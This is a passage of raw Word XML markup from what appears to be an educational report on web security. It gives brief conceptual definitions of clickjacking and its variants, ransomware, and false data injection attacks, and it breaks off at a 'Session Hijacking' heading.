        <w:t xml:space="preserve">The most common method of clickjacking is to overlay the website the user sees with an invisible page or HTML element that is shown inside of an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. The user may not have intended to access the lawful or malicious pages that are invisible. for example, a page on the user's banking website that approves a money transfer can be clickjacked. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D824869" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A20947A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="370" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">There are various clickjacking attack variations: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECC5DE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F9C4F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jacking :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> This method involves manipulating the Facebook "Like" button to trick users into "liking" a page they really didn't want to. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC4132" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDBB02" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="243" w:lineRule="auto"/>
        <w:ind w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cursor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jacking :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cursor jacking is a method of UI redressing that shifts the cursor from the place the user sees to a different position. Cursor jacking makes use of flaws in Firefox and Flash that have since been addressed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C1D22" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1340" w:right="10592"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10833" w:type="dxa"/>
        <w:tblInd w:w="-801" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="150" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="183" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1521"/>
        <w:gridCol w:w="9312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F97B52" w14:paraId="4749BFB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3399"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C668BC1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="1161"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550C1BE4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="67"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>•</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9313" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="double" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4C96DD2F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="12"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransomware Attack </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B0285E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
              <w:ind w:right="465"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Ransomware is a type of malicious software (malware) that threatens to publish or blocks access to data or a computer system, usually by encrypting it, until the victim pays a ransom fee to the attacker. In many cases, the ransom demand comes with a deadline. If the victim doesn’t pay in time, the data is gone forever or the ransom increases. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B098540" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F97B52" w14:paraId="0F8F77B5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="12364"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1521" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="734BC22A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="1606"/>
              <w:ind w:right="67"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>•</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C64AF6F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAAF7A2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22EAF88A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B4D952F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A60F7C0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550D6C1F" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EF9C643" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F37F2D9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306C4813" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4515C131" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EA148CB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C728557" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10721C2C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04AF74FE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A27DFCE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46C1D021" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145A6A37" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BA98CDB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628D9555" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CA6CDBF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562FF97E" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09834034" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B42ADD0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1812AA67" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2000D8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="341"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:color w:val="6F2F9F"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9313" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="double" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29CD26A0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="12"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">False Data Injection Attack </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4F9EE4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="233"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">False Data Injection encompasses a class of malicious data attacks that target critical infrastructures controlled by Cyber-Physical Information Systems. FDIA strategies involve the attacker compromising sensor readings, so undetected corrupt data is included in calculating values and variables used to define the system state. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DF01D4B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc48949"/>
      <w:r>
        <w:t xml:space="preserve">IMPACTS OF THE ATTACK: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4FA0851C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:color w:val="6F2F9F"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F6C38" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="10" w:line="249" w:lineRule="auto"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Session Hijacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C879382" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
